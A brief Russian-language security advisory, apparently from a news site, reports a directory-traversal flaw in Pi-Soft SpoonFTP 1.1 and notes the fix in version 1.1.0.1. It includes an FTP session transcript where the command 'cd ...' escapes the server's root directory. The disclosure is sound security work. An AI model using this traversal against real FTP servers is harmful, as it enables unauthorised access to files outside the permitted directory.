Выход за пределы рут директории в Pi-Soft SpoonFTP 1.1

В Pi-Soft SpoonFTP 1.1 существует уязвимость, позволяющая выйти за пределы рут директории. Для решения был выпущен
релиз Pi-Soft SpoonFTP 1.1.0.1, в котором эта проблема исправлена.

ftp localhost
Connected to xxxxxxxx.edu.
220 SpoonFTP V1.1
User (xxxxxxxx.edu:(none)): jdog
331 Password required.
Password:
230 User logged in, proceed.
ftp> pwd
257 "/" is current directory.
ftp> cd ...
250 CWD command successful.
ftp> pwd
257 "/..." is current directory.
ftp

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии